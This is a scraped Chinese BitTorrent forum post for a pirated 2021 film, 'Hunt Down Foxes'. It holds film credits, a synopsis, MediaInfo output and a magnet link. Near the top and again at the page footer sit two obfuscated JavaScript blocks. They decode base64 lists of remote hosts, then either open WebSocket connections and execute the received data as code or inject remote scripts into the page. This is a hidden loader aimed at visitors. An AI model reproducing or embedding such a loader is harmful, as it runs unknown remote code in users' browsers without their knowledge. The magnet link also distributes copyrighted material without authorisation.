东北传说之猎狐[国语配音/中文字幕].Hunt.Down.Foxes.2021.2160p.WEB-DL.H265.DDP2.0 1.05GB

版主小s 23天前 202

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 东北传说之猎狐 / 东北怪谈之猎狐

◎年 代 2021

◎产 地 中国大陆

◎类 别 悬疑

◎语 言 汉语普通话

◎上映日期 2021-11-10(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/35184154/

◎导 演 赵海涛 Haitao Zhao (id:1462741)

◎编 剧 陶思维 Siwei Tao (id:1448213)

◎演 员 何索 Suo He (id:1392903)

方品淇 Pinqi Fang (id:1462742)

赵亮 Liang Zhao (id:1314024)

李大强 Daqiang Li (id:1335692)

刘滨 Bin Liu (id:1371228)

顾海 Hai Gu (id:1343906)

祝海钰 (id:1461214)

谢毅 Yi Xie (id:1397812)

◎标 签 悬疑 / 恐怖 / 剧情 / 大陆 / 犯罪 / 2021 / 赵亮 / 老闫

◎简 介

所谓:南方道,北方仙,胡黄不过山海关。中国东北一直流传着很邪乎的“出马仙”。传说中,有“狐、黄、白、柳、灰”五大仙家。

五仙有恩必赏,有仇必报,东北话说就是“护犊子”。所以五仙又被称为“保家仙”。出马仙是和仙家结缘的人,世代供奉,能与仙家沟通,用仙家的力量治病救人积德行善。仙家和出马仙一般会缔结契约,同生共死。

五大保家仙中,又以狐家的胡三太奶为大,法力最强,最重情重义。

民国年间,东北深山里的马家屯就传闻一直受胡三太奶庇佑。但有村民为钱财上山盗了胡家世代守护的祖坟,掏了狐狸窝,触怒了狐仙一族。之后村里开始发生各种邪乎事,村里的男人陆续惨死,女人被凌辱虐待。村里请了出马仙来做法,万物有灵,到底是狐仙可怕,还是人心更可怕……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 245079153037382903793343206083391907334 (0xB860872840FF9A788AE20E5D1E77E606)

  4. Complete name : 东北传说之猎狐[email protected]mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.05 GiB

  8. Duration : 1 h 10 min

  9. Overall bit rate : 2 129 kb/s

  10. Encoded date : UTC 2021-11-10 04:46:17

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 10 min

  20. Bit rate : 1 745 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 726 pixels

  23. Display aspect ratio : 2.225

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.011

  30. Stream size : 885 MiB (82%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 10 min

  40. Bit rate mode : Constant

  41. Bit rate : 256 kb/s

  42. Channel(s) : 2 channels

  43. Channel layout : L R

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Delay relative to video : -42 ms

  48. Stream size : 130 MiB (12%)

  49. Language : Chinese

  50. Service kind : Complete Main

  51. Default : Yes

  52. Forced : No


  53. Audio #2

  54. ID : 3

  55. Format : AAC LC

  56. Format/Info : Advanced Audio Codec Low Complexity

  57. Codec ID : A_AAC-2

  58. Duration : 1 h 10 min

  59. Bit rate : 125 kb/s

  60. Channel(s) : 2 channels

  61. Channel layout : L R

  62. Sampling rate : 48.0 kHz

  63. Frame rate : 46.875 FPS (1024 SPF)

  64. Compression mode : Lossy

  65. Delay relative to video : -42 ms

  66. Stream size : 63.5 MiB (6%)

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No




复制代码


TAGS 悬疑

磁力链:
  • magnet:?xt=urn:btih:EB0F6876B900C3DD54F84065B76BE94923AEB93E

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};